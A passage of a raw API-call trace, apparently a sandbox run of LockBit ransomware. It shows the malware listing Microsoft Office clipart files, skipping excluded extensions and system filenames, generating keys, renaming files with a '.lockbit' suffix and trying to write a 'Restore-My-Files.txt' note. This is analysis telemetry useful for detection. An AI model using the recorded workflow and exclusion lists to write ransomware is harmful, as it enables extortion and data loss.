(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.622] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21290a00, ftCreationTime.dwHighDateTime=0x1bdf6f5, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21290a00, ftLastWriteTime.dwHighDateTime=0x1bdf6f5, nFileSizeHigh=0x0, nFileSizeLow=0x3ed2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0182946.WMF", cAlternateFileName="")) returned 1 [0147.623] lstrcmpiW (lpString1=".", lpString2="J0182946.WMF") returned -1 [0147.623] lstrcmpiW (lpString1="..", lpString2="J0182946.WMF") returned -1 [0147.623] PathFindExtensionW (pszPath="J0182946.WMF") returned=".WMF" [0147.623] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.623] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.624] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.625] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.625] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0182946.WMF") returned 1 [0147.626] lstrcmpiW (lpString1="ntldr", lpString2="J0182946.WMF") returned 1 [0147.626] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0182946.WMF") returned 1 [0147.626] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0182946.WMF") returned -1 [0147.626] lstrcmpiW (lpString1="autorun.inf", lpString2="J0182946.WMF") returned -1 [0147.626] lstrcmpiW (lpString1="thumbs.db", lpString2="J0182946.WMF") returned 1 [0147.626] lstrcmpiW (lpString1="iconcache.db", lpString2="J0182946.WMF") returned -1 [0147.626] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.626] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned=".WMF" [0147.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.626] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.626] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.627] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.627] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.lockbit") returned 72 [0147.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.629] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.629] malloc (_Size=0x40068) returned 0x3fb00b8 [0147.629] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=16082) returned 1 [0147.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.629] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0147.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0147.630] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0147.636] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.636] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.636] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.637] free (_Block=0x1fa2ed8) [0147.637] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.638] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.638] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.638] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x745c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183172.WMF", cAlternateFileName="")) returned 1 [0147.638] lstrcmpiW (lpString1=".", lpString2="J0183172.WMF") returned -1 [0147.638] lstrcmpiW (lpString1="..", lpString2="J0183172.WMF") returned -1 [0147.638] PathFindExtensionW (pszPath="J0183172.WMF") returned=".WMF" [0147.638] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.638] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.639] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.639] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.640] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183172.WMF") returned 1 [0147.640] lstrcmpiW (lpString1="ntldr", lpString2="J0183172.WMF") returned 1 [0147.640] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183172.WMF") returned 1 [0147.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183172.WMF") returned -1 [0147.641] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183172.WMF") returned -1 [0147.641] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183172.WMF") returned 1 [0147.641] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183172.WMF") returned -1 [0147.641] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.641] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned=".WMF" [0147.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.641] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.641] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.642] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.642] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.lockbit") returned 72 [0147.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0147.693] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.693] malloc (_Size=0x40068) returned 0x3df0008 [0147.693] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29788) returned 1 [0147.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.694] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.697] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.697] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.697] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.698] free (_Block=0x1fa2ed8) [0147.698] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.698] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.698] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6fd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183174.WMF", cAlternateFileName="")) returned 1 [0147.698] lstrcmpiW (lpString1=".", lpString2="J0183174.WMF") returned -1 [0147.698] lstrcmpiW (lpString1="..", lpString2="J0183174.WMF") returned -1 [0147.698] PathFindExtensionW (pszPath="J0183174.WMF") returned=".WMF" [0147.699] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.699] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.700] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.700] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183174.WMF") returned 1 [0147.701] lstrcmpiW (lpString1="ntldr", lpString2="J0183174.WMF") returned 1 [0147.701] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183174.WMF") returned 1 [0147.701] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183174.WMF") returned -1 [0147.701] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183174.WMF") returned -1 [0147.701] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183174.WMF") returned 1 [0147.701] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183174.WMF") returned -1 [0147.701] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.701] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned=".WMF" [0147.701] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.701] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.701] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.702] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 